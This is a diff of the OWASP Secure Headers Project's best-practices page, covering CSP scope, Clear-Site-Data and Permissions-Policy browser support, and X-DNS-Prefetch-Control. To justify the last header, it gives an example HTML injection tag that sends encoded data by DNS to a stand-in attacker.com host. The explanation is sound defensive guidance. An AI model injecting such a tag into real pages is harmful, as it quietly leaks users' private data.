OWASP/www-project-secure-headers/tab_bestpractices.md

 🚩 Regarding the header `Content-Security-Policy`, keep in mind that the policy applicability depends on the execution context.
 Technical details are available [here](https://www.w3.org/TR/CSP2/#which-policy-applies).
 Therefore, CSP usage in a web API application implies to **define the CSP in the document consuming the content of the web API**.

 🚩 The header `Clear-Site-Data` will cause the browser to take additional processing time for the HTTP response, so, set it to the logout function when possible.
+Additional information about the support for experimental values:

+* Experimental value `"executionContexts"` is not supported by Chromium version `140.0.7292.0`.
+* Experimental values `"executionContexts"`, `"prefetchCache"`, `"prerenderCache"` and `"clientHints"` are not supported by Firefox version `141.0.3`.

 🚩 The header `X-DNS-Prefetch-Control` seems currently only supported by [Chromium based browsers](https://github.com/OWASP/www-project-secure-headers/issues/201#issuecomment-3190756900) and more precisely Chrome for the `off` instruction.
 Therefore, as Chrome is highly used ([source](https://gs.statcounter.com/browser-market-share)), the proposal is to add the header on HTTP response which either:

 * Return sensitive or private content (commonly called [PII](https://en.wikipedia.org/wiki/Personal_data)).
 * Prone to HTML injection where an attacker can inject a tag `<link rel="dns-prefetch" href="//[exfiltrated data encoded].attacker.com">` to exfiltrate data quietly via DNS or be notified via DNS when the victim rendered the response in a browser.

-🔬 For the header `Permissions-Policy`, as it is currently only supported by [Chromium based browsers](https://caniuse.com/permissions-policy), the proposed value was generated with this [site](https://www.permissionspolicy.com/) and tested against the version `137.0.7124.0` of [Chromium](https://chromium.woolyss.com/download/en/) to only specify supported features.
+🔬 For the header `Permissions-Policy`, as it is currently only supported by [Chromium based browsers](https://caniuse.com/permissions-policy), the proposed value was generated with this [site](https://www.permissionspolicy.com/) and tested against the version `140.0.7292.0` of [Chromium](https://chromium.woolyss.com/download/en/) to only specify supported features.

 💡 Content of the table below is also provided, as JSON, via this [file](ci/headers_add.json) (automatically updated).